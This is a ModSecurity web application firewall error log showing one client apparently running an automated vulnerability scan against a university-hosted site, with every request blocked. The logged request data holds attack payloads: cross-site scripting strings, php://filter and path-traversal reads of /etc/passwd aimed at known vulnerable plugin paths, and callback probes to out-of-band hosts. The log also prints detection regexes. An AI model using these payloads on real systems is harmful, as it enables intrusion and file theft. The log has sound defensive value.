[Tue Aug 29 11:53:08.274856 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoT7T4AAAAD"]
[Tue Aug 29 11:53:08.279253 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoLfQAAAAAG"]
[Tue Aug 29 11:53:08.355825 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAoesLIAAAAV"]
[Tue Aug 29 11:53:08.786317 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoAkwkAAAAC"]
[Tue Aug 29 11:53:09.664441 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAolKTsAAAAe"]
[Tue Aug 29 11:53:10.821398 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAfWOU0AAAAL"]
[Tue Aug 29 11:53:11.790415 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAot8MgAAAAn"]
[Tue Aug 29 11:53:11.810742 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAofm5IAAAAX"]
[Tue Aug 29 11:53:11.958992 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAofm5MAAAAX"]
[Tue Aug 29 11:53:14.407868 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15usCo-f0AAAor7qEAAAAk"]
[Tue Aug 29 11:53:14.471828 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAoXJvEAAAAP"]
[Tue Aug 29 11:53:14.601698 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAor7qQAAAAk"]
[Tue Aug 29 11:53:15.973321 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoXJvQAAAAP"]
[Tue Aug 29 11:53:16.554508 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoesMkAAAAV"]
[Tue Aug 29 11:53:17.850794 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAojapwAAAAb"]
[Tue Aug 29 11:53:18.548266 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAowNnYAAAAH"]
[Tue Aug 29 11:53:18.693046 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAnTlbwAAAAA"]
[Tue Aug 29 11:53:19.862286 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAoT7WYAAAAD"]
[Tue Aug 29 11:53:19.940101 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoLfSIAAAAG"]
[Tue Aug 29 11:53:20.166668 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAox7FwAAAAN"]
[Tue Aug 29 11:53:20.547782 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAoW7O8AAAAJ"]
[Tue Aug 29 11:53:21.685432 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoqbRsAAAAj"]
[Tue Aug 29 11:53:23.391021 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAot8PYAAAAn"]
[Tue Aug 29 11:53:23.548343 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15w8Co-f0AAAoesN4AAAAV"]
[Tue Aug 29 11:53:24.121472 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAox7GYAAAAN"]
[Tue Aug 29 11:53:24.695347 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoW7PsAAAAJ"]
[Tue Aug 29 11:53:24.784580 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAog@FEAAAAY"]
[Tue Aug 29 11:53:26.250308 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/search"] [unique_id "ZO15xsCo-f0AAAoT7XsAAAAD"]
